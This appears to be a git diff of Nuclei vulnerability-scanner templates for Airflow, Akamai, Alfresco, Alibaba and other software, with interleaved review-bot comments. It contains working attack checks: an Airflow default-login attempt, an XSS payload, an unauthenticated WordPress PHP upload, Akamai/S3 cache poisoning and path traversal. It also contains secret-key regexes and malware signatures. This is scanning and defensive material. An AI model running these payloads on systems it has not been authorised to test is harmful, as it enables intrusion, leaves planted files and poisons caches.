@@ -1,64 +0,0 @@ -id: airflow-default-login - -info: - name: Apache Airflow Default Login - author: pdteam - severity: high - description: An Apache Airflow default login was discovered. - reference: - - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - metadata: - shodan-query: title:"Sign In - Airflow" - tags: airflow,default-login,apache - -requests: - - raw: - - | - GET /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - - - | - POST /login/ HTTP/1.1 - Host: {{Hostname}} - Origin: {{BaseURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{BaseURL}}/admin/airflow/login - - username={{username}}&password={{password}}&_csrf_token={{csrf_token}} - - attack: pitchfork - payloads: - username: - - airflow - password: - - airflow - - cookie-reuse: true - extractors: - - type: regex - name: csrf_token - group: 1 - internal: true - regex: - - 'type="hidden" value="(.*?)">' - - req-condition: true - matchers-condition: and - matchers: - - type: dsl - dsl: - - 'contains(body_1, "Sign In - Airflow")' - - 'contains(all_headers_2, "session=.")' - - 'status_code_2 == 302' - condition: and - - - type: word - words: - - 'You should be redirected automatically to target URL: ' - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-detect-240.yaml b/nuclei-templates/Other/airflow-detect-239.yaml similarity index 100% rename from nuclei-templates/Other/airflow-detect-240.yaml rename to nuclei-templates/Other/airflow-detect-239.yaml diff --git a/nuclei-templates/Other/airflow-panel-242.yaml b/nuclei-templates/Other/airflow-panel-242.yaml new file mode 100644 index 0000000000..05b609b98f --- /dev/null +++ b/nuclei-templates/Other/airflow-panel-242.yaml 
@@ -0,0 +1,19 @@ +id: airflow-panel +info: + name: Airflow Admin login + author: pdteam + severity: info + tags: panel,apache,airflow +requests: + - method: GET + path: + - "{{BaseURL}}/admin/airflow/login" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Airflow - Login" + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/airflow-panel-245.yaml b/nuclei-templates/Other/airflow-panel-245.yaml deleted file mode 100644 index 47a13475f4..0000000000 --- a/nuclei-templates/Other/airflow-panel-245.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: airflow-panel - -info: - name: Airflow Admin login - author: pdteam - severity: info - tags: panel,apache,airflow - metadata: - shodan-query: title:"Sign In - Airflow" - -requests: - - method: GET - path: - - "{{BaseURL}}/login/" - - "{{BaseURL}}/admin/airflow/login" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "Airflow - Login" - - "Sign In - Airflow" - condition: or - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/Airflow-unauthorized.yaml b/nuclei-templates/Other/airflow-unauthorized.yaml similarity index 100% rename from nuclei-templates/Other/Airflow-unauthorized.yaml rename to nuclei-templates/Other/airflow-unauthorized.yaml diff --git a/nuclei-templates/Other/airnotifier-panel.yaml b/nuclei-templates/Other/airnotifier-panel.yaml index 9243246a9a..4120df8a00 100644 --- a/nuclei-templates/Other/airnotifier-panel.yaml +++ b/nuclei-templates/Other/airnotifier-panel.yaml @@ -7,14 +7,14 @@ info: description: AirNotifier login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 metadata: - verified: true + max-request: 1 shodan-query: http.title:"AirNotifier" + verified: true tags: panel,airnotifier -requests: +http: - method: GET path: - '{{BaseURL}}/auth/login' 
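Review bot: The new airflow-panel only requests `/admin/airflow/login` and matches `"Airflow - Login"`, whereas the `airflow-panel-245.yaml` removed in this same commit also probed `/login/` for `"Sign In - Airflow"` (the same title the `shodan-query` in airflow-default-login keys on), so the replacement loses detection of deployments that serve the newer login page. The `shodan-query` metadata the old file carried is dropped as well. I would restore the second path and title with `condition: or` and `stop-at-first-match: true`, as below.

```yaml
    path:
      - "{{BaseURL}}/login/"
      - "{{BaseURL}}/admin/airflow/login"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Airflow - Login"
          - "Sign In - Airflow"
        condition: or
      # … unchanged: status 200 matcher …
```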
@@ -37,5 +37,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/10 +# digest: 490a0046304402207fb28075cac9c1b3e06234ce965a9e715df9fd9d77688d7be5e867d37c08fb93022062bfb7fd3f956b5ddb44e1a53fd4df73afac4846df3ffe9835895ec2a4fa40a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/airtable-key.yaml b/nuclei-templates/Other/airtable-key.yaml index 20c3eb5596..e03a14db8b 100644 --- a/nuclei-templates/Other/airtable-key.yaml +++ b/nuclei-templates/Other/airtable-key.yaml @@ -9,8 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/airtable-api-key.go metadata: verified: true - tags: airtable,file,token - + tags: keys,file,airtable,token file: - extensions: - all @@ -19,4 +18,5 @@ file: - type: regex part: body regex: - - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:airtable)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{17})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 490a004630440220673067de4dbbe1d9d4f9337d2eddd6903ed401646b5e2ef23b4cb4fbc15e4bb40220774a7aafc56f3023bd7d681d429badb45d714352a8fcb74844e5913b116cfce2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ait-csv-import-export-rce.yaml b/nuclei-templates/Other/ait-csv-import-export-rce.yaml index 9a31a4d4e8..b09444699f 100644 --- a/nuclei-templates/Other/ait-csv-import-export-rce.yaml +++ b/nuclei-templates/Other/ait-csv-import-export-rce.yaml 
@@ -13,9 +13,14 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N cvss-score: 9.8 cwe-id: CWE-434 + metadata: + max-request: 2 tags: wp-plugin,rce,fileupload,unauth,wpscan,msf,wordpress,ait-csv,wp,intrusive -requests: +variables: + string: "ait-csv-import-export-rce" + +http: - raw: - | POST /wp-content/plugins/ait-csv-import-export/admin/upload-handler.php HTTP/1.1 @@ -27,10 +32,9 @@ requests: Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Type: application/octet-stream - sep=; + sep=; --------------------------ab360007dbae2de8-- - - | GET /wp-content/uploads/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} @@ -38,12 +42,7 @@ requests: matchers-condition: and matchers: - type: word - part: body + part: body_2 words: - - "fe394b60dc324c3bac3060d600ad4349" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/22 + - '{{md5(string)}}' +# digest: 4a0a0047304502203dbe9ee0c251236f440cd8c6935333f6dc51bd895808da6870155c24df8c64b2022100b7821bd07973808a30f1871fc4551a454d614efd4f69739bbc1e53a87b4d2364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/aj-report.yaml b/nuclei-templates/Other/aj-report.yaml new file mode 100644 index 0000000000..2135ab0cb8 --- /dev/null +++ b/nuclei-templates/Other/aj-report.yaml @@ -0,0 +1,20 @@ +id: aj-report +info: + name: aj-report + author: cn-kali-team + tags: detect,tech,aj-report + severity: info + metadata: + fofa-query: + - title="aj-report" + product: aj-report + vendor: anji-plus + verified: true +http: +- method: GET + path: + - '{{BaseURL}}/' + matchers: + - type: regex + regex: + - (?mi)]*>aj-report.*? diff --git a/nuclei-templates/Other/akamai-arl-xss-248.yaml b/nuclei-templates/Other/akamai-arl-xss-248.yaml new file mode 100644 index 0000000000..9d1034a158 --- /dev/null +++ b/nuclei-templates/Other/akamai-arl-xss-248.yaml 
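Review bot: The second request in ait-csv-import-export-rce fetches `/wp-content/uploads/{{randstr}}.php` to confirm execution, but nothing removes that file afterwards, so every positive scan leaves an attacker-style PHP file in the target's uploads directory; the `intrusive` tag hints at this but the template should say it outright, e.g. a header comment `# NOTE: leaves wp-content/uploads/{{randstr}}.php on the target; remove it after confirming the finding.` The multipart body carrying the PHP payload is only partly inside these hunks, so I cannot tell what the uploaded file does beyond echoing `md5(string)`. Separately, `cvss-score: 9.8` does not agree with the listed `cvss-metrics` (`AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N` evaluates to roughly 7.2), and unauthenticated remote code execution warrants `C:H/I:H/A:H`; one of the two lines should be corrected.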
@@ -0,0 +1,31 @@ +id: akamai-arl-xss + +info: + name: Open Akamai ARL XSS + author: pdteam + severity: medium + tags: akamai,xss + reference: + - https://github.com/war-and-code/akamai-arl-hack + - https://twitter.com/SpiderSec/status/1421176297548435459 + - https://warandcode.com/post/akamai-arl-hack/ + - https://github.com/cybercdh/goarl + - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US + +requests: + - method: GET + path: + - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" + + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '">' + - 'Suggestions for improving the results' + + - type: word + part: header + words: + - 'text/html' \ No newline at end of file diff --git a/nuclei-templates/Other/akamai-arl-xss-249.yaml b/nuclei-templates/Other/akamai-arl-xss-249.yaml deleted file mode 100644 index 6a9c5fd334..0000000000 --- a/nuclei-templates/Other/akamai-arl-xss-249.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: akamai-arl-xss - -info: - name: Open Akamai ARL - Cross-Site Scripting - author: pdteam - severity: medium - reference: - - https://github.com/war-and-code/akamai-arl-hack - - https://twitter.com/SpiderSec/status/1421176297548435459 - - https://warandcode.com/post/akamai-arl-hack/ - - https://github.com/cybercdh/goarl - - https://community.akamai.com/customers/s/article/WebPerformanceV1V2ARLChangeStartingFebruary282021?language=en_US - tags: akamai,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E" - - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '">' - - 'Suggestions for improving the results' - - - type: word - part: header - words: - - 'text/html' 
diff --git a/nuclei-templates/Other/akamai-cache-detect.yaml b/nuclei-templates/Other/akamai-cache-detect.yaml index d79c43f010..44fab4d29d 100644 --- a/nuclei-templates/Other/akamai-cache-detect.yaml +++ b/nuclei-templates/Other/akamai-cache-detect.yaml @@ -5,23 +5,26 @@ info: author: nybble04 severity: info description: | - Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. + Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. reference: - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ metadata: verified: true + max-request: 1 tags: cache,akamai,tech -requests: +http: - method: HEAD path: - "{{BaseURL}}" + headers: Pragma: akamai-x-cache-on - matchers: - type: regex part: header regex: - '(?:TCP_HIT|TCP_MISS).*deploy\.akamaitechnologies\.com' + +# digest: 4a0a00473045022011341588cf8e4c3fef946497f57b95b143aa9947a35255c0c6c96b5a70d1ba8b022100910f3e2b59c3d46eacdebcf3a458b69e2f86333e12b96dcd775e0f5e48af45d0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/akamai-cloudtest.yaml b/nuclei-templates/Other/akamai-cloudtest-254.yaml similarity index 100% rename from nuclei-templates/Other/akamai-cloudtest.yaml rename to nuclei-templates/Other/akamai-cloudtest-254.yaml diff --git a/nuclei-templates/Other/akamai-detect.yaml b/nuclei-templates/Other/akamai-detect.yaml index 6befa6e7f2..5128bbfcdb 100644 --- a/nuclei-templates/Other/akamai-detect.yaml +++ b/nuclei-templates/Other/akamai-detect.yaml 
@@ -8,18 +8,21 @@ info: - https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ + metadata: + max-request: 1 tags: akamai,cdn,tech - -requests: +http: - method: GET path: - "{{BaseURL}}" + headers: Pragma: akamai-x-cache-on - matchers: - type: word part: x_cache words: - "deploy.akamai" + +# digest: 490a0046304402204cfdfcfd8138c730176b2d360e96b97de9785e215e4fa1c768574552e496d1ee02200ce0780445c2e3bd98b1b58aa75583c5b50957d2d9d1515743f898828ac02e02:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml b/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml index 2eeded9ef0..3266ae65bd 100644 --- a/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml +++ b/nuclei-templates/Other/akamai-s3-cache-poisoning.yaml 
@@ -1,20 +1,25 @@ id: akamai-s3-cache-poisoning info: - name: Akamai / S3 Cache Poisoning - Stored Cross-Site Scripting + name: Akamai/Amazon S3 - Cache Poisoning author: DhiyaneshDk severity: high + description: Akamai/Amazon S3 expose a stored cross-site scripting vulnerability generated by cache poisoning capability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can further allow the attacker to steal cookie-based authentication credentials and launch other attacks. reference: - https://web.archive.org/web/20230101082612/https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ - https://owasp.org/www-community/attacks/Cache_Poisoning + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L + cvss-score: 7.1 + cwe-id: CWE-44 metadata: - verified: "true" - tags: cache,poisoning,generic,xss,akamai,s3 - + verified: true + max-request: 204 + tags: cache,poisoning,xss,akamai,s3,misconfig variables: rand: "{{rand_base(5)}}" -requests: +http: - raw: - |+ GET /nuclei.svg?{{rand}}=x HTTP/1.1 @@ -28,13 +33,12 @@ requests: attack: clusterbomb payloads: escape: - - "\x0b" - - "\x0c" + - "\v" + - "\f" - "\x1c" - "\x1d" - "\x1e" - "\x1f" - bucket: - "nuclei-ap-northeast-1" - "nuclei-ap-northeast-2" @@ -53,7 +57,6 @@ requests: - "nuclei-us-east-2" - "nuclei-us-west-1" - "nuclei-us-west-2" - stop-at-first-match: true unsafe: true matchers: @@ -62,3 +65,5 @@ requests: - 'contains(body_2, "alert(document.domain)")' - 'status_code_2 == 200' condition: and + +# digest: 490a0046304402205d755aa1fb1c07d6eac253f8ed760b27408545a8b3bd8104e6cb8298d05d720802204ffa53e1789ed44edb45fc98d3b03deaa7da5566a8bf3a3bce1b6ac03c1df145:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/akismet.yaml b/nuclei-templates/Other/akismet.yaml index 834d3be60a..f68ad2a6bf 100644 --- a/nuclei-templates/Other/akismet.yaml +++ b/nuclei-templates/Other/akismet.yaml 
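Review bot: Without `stop-at-first-match: true`, which hunk `@@ -53,7 +57,6 @@` removes, the clusterbomb over the escape bytes and bucket names keeps running after a hit, so a confirmed-vulnerable target receives every one of the requests advertised by `max-request: 204`; since each pair is built to write an `alert(document.domain)` response into the shared Akamai cache, that multiplies the poisoned entries left behind on a real target instead of stopping at the first proof. I would put `stop-at-first-match: true` back beside `unsafe: true`. The new `cwe-id: CWE-44` (path equivalence, internal dot) also does not describe what the `description` calls stored cross-site scripting via cache poisoning; `CWE-79` matches the stated impact.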
@@ -1,7 +1,7 @@ id: wordpress-akismet info: - name: Akismet Spam Protection Detection + name: Akismet Anti-spam' Spam Protection Detection author: ricardomaia severity: info reference: @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/alfa-malware.yaml b/nuclei-templates/Other/alfa-malware.yaml index 3f794408ea..f04ebb7959 100644 --- a/nuclei-templates/Other/alfa-malware.yaml +++ b/nuclei-templates/Other/alfa-malware.yaml @@ -6,14 +6,14 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RANSOM_Alpha.yar tags: malware,file - file: - extensions: - all - matchers: - type: binary binary: - "8B0C9781E1FFFF000081F919040000740F81F9" - "220400007407423BD07CE2EB02" condition: and + +# digest: 4a0a0047304502206fd1a4e1b8a904da814aa19c10249a96a98fa29233f922bab161e3b93d413a00022100a147f5f3a192423bda7f022ad0bb3dd91d1a8d321d9a6687c9da0ca35ce98476:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml b/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml deleted file mode 100644 index f8d61143d9..0000000000 --- a/nuclei-templates/Other/alfacgiapi-wordpress-256.yaml +++ /dev/null 
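Review bot: The renamed `name: Akismet Anti-spam' Spam Protection Detection` carries a stray apostrophe after `Anti-spam`, which looks like a mistyped colon. If a colon is intended, the value must be quoted, `name: "Akismet Anti-spam: Spam Protection Detection"`, because an unquoted `: ` inside a plain YAML scalar is a mapping indicator and the template would fail to parse.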
@@ -1,33 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress.yaml b/nuclei-templates/Other/alfacgiapi-wordpress.yaml new file mode 100644 index 0000000000..27d4456e69 --- /dev/null +++ b/nuclei-templates/Other/alfacgiapi-wordpress.yaml @@ -0,0 +1,32 @@ +id: alfacgiapi-wordpress + +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alfresco-detect-258.yaml b/nuclei-templates/Other/alfresco-detect-258.yaml new file mode 100644 index 0000000000..bb8f41ee52 --- /dev/null 
+++ b/nuclei-templates/Other/alfresco-detect-258.yaml @@ -0,0 +1,33 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + severity: info + tags: alfresco,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/alfresco-detect-259.yaml b/nuclei-templates/Other/alfresco-detect-259.yaml deleted file mode 100644 index 0a9414afb1..0000000000 --- a/nuclei-templates/Other/alfresco-detect-259.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: alfresco-detect - -info: - name: Alfresco CMS Detection - author: pathtaga - description: Alfresco CMS was discovered. - severity: info - tags: alfresco,tech,panel - reference: - - https://www.alfresco.com/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' - - - type: word - part: header - words: - - "application/json" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/algolia-key.yaml b/nuclei-templates/Other/algolia-key.yaml index 7724867bb5..69d977c2c2 100644 
--- a/nuclei-templates/Other/algolia-key.yaml +++ b/nuclei-templates/Other/algolia-key.yaml @@ -10,7 +10,6 @@ info: metadata: verified: true tags: algolia,file,keys - file: - extensions: - all @@ -19,4 +18,6 @@ file: - type: regex part: body regex: - - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:algolia)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$) + +# digest: 4a0a0047304502200114ce7db1c3fde42b20020e1d0ccddb88507568c665f21e1cdc8a7b722defdb022100c707d824ef36106683f16cc962e32ac899c727c5b22db59a7af8a4ab957a27d6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml b/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml similarity index 100% rename from nuclei-templates/Other/Alibaba-Anyproxy-fileRead.yaml rename to nuclei-templates/Other/alibaba-anyproxy-fileread.yaml diff --git a/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml b/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml index 8cd2bbe4a2..cdd42eafad 100644 --- a/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml +++ b/nuclei-templates/Other/alibaba-anyproxy-lfi.yaml @@ -4,6 +4,7 @@ info: name: Alibaba Anyproxy fetchBody File - Path Traversal author: DhiyaneshDk severity: high + description: Alibaba Anyproxy is vulnerable to Path Traversal. reference: - https://github.com/alibaba/anyproxy/issues/391 - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Alibaba%20AnyProxy%20fetchBody%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md 
@@ -25,5 +26,4 @@ http: - contains(body, '\"id\":') - status_code == 200 condition: and - -# digest: 490a00463044022071555a9d1201d1e65a5a44e0e31a75e29ce4267145e86209b6cc9c257d19f87f022075d2405b30226fcf49b5b4d8a96f093ad88722ba598d8eeab0a2b60b517b3118:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022068deda934b82dc15a20aeece7b291bec783b3071a5e5e18902003c757c07b43802204c69872aeb22e0f649667a5e13377d6762a4a361898e5eac70d24b63bb360472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alibaba-canal-default-password.yaml b/nuclei-templates/Other/alibaba-canal-default-password-262.yaml similarity index 100% rename from nuclei-templates/Other/alibaba-canal-default-password.yaml rename to nuclei-templates/Other/alibaba-canal-default-password-262.yaml diff --git a/nuclei-templates/Other/alibaba-key-id.yaml b/nuclei-templates/Other/alibaba-key-id.yaml index faeed4e86a..bb4c46c490 100644 --- a/nuclei-templates/Other/alibaba-key-id.yaml +++ b/nuclei-templates/Other/alibaba-key-id.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)\b((LTAI)(?i)[a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 490a0046304402202a929c5a7c56fdcba6baf8a05f5ee26de1dc68039a330a33dba7e6973876605b0220499fe8d24c2d03e30f7ffa4077775380ea6b237262bfdc1319821135d3bf0faf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml index 23048a649f..6de46b6ec7 100644 --- a/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml +++ b/nuclei-templates/Other/alibaba-mongoshake-unauth.yaml @@ -4,7 +4,7 @@ info: name: Alibaba Mongoshake Unauth author: pikpikcu severity: info - tags: mongoshake,unauth,alibaba + tags: mongoshake,unauth requests: - method: GET 
diff --git a/nuclei-templates/Other/alibaba-secret-id.yaml b/nuclei-templates/Other/alibaba-secret-id.yaml index 9324354baf..2bd7d4389a 100644 --- a/nuclei-templates/Other/alibaba-secret-id.yaml +++ b/nuclei-templates/Other/alibaba-secret-id.yaml @@ -19,4 +19,5 @@ file: - type: regex part: body regex: - - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) \ No newline at end of file + - (?i)(?:alibaba)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{30})(?:['|\"|\n|\r|\s|\x60|;]|$) +# digest: 4b0a0048304602210087f98e454e5064757753028db3f4a280d96ee2ba47163b503031bb9000820d73022100f8348ca58ad2ee80dba4b7ccbca37a95b7ba44742a4f0ed2f5fd64b952843ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/alienspy-malware.yaml b/nuclei-templates/Other/alienspy-malware.yaml index bd5ead14b3..5a35a25748 100644 --- a/nuclei-templates/Other/alienspy-malware.yaml +++ b/nuclei-templates/Other/alienspy-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/RAT_Ratdecoders.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -22,4 +20,6 @@ file: - "password.ini" - "stub/stub.dll" - "c.dat" - condition: and \ No newline at end of file + condition: and + +# digest: 4b0a0048304602210099bae7391b6cf2278da97789c2cb44af6ea6a4983b92016e59a3456fa593335f022100cbc010d1b5dff13672cb5c07314431e7f74d24f8bc0c2035185d3c08269a3be3:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/alienvault-usm-274.yaml b/nuclei-templates/Other/alienvault-usm-274.yaml index ded506566b..cad5bd5dc5 100644 --- a/nuclei-templates/Other/alienvault-usm-274.yaml +++ b/nuclei-templates/Other/alienvault-usm-274.yaml 
@@ -1,12 +1,18 @@ id: alienVault-usm info: - name: AlienVault USM + name: AlienVault USM Login Panel author: dhiyaneshDK severity: info tags: panel,alienvault + description: An AlienVault USM login panel was detected. metadata: shodan-query: 'http.title:"AlienVault USM"' + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET @@ -21,3 +27,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/alina-malware.yaml b/nuclei-templates/Other/alina-malware.yaml index 9b4f6141e0..98a994dc65 100644 --- a/nuclei-templates/Other/alina-malware.yaml +++ b/nuclei-templates/Other/alina-malware.yaml @@ -6,11 +6,9 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Alina.yar tags: malware,file - file: - extensions: - all - matchers: - type: word part: raw @@ -18,4 +16,6 @@ file: - 'Alina v1.0' - 'POST' - '1[0-2])[0-9]' - condition: and \ No newline at end of file + condition: and + +# digest: 4b0a00483046022100a267b4decff9664b60695730319caed7c613138a358e3697b3e1b0566b20872c022100cf3ac7fafc2bed1b5d599729fcde42a0ac732f400b015a260b1a493fe8e8c193:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/all-404-redirect-to-homepage.yaml b/nuclei-templates/Other/all-404-redirect-to-homepage.yaml index 47b14549c1..9c340e8422 100644 --- a/nuclei-templates/Other/all-404-redirect-to-homepage.yaml +++ 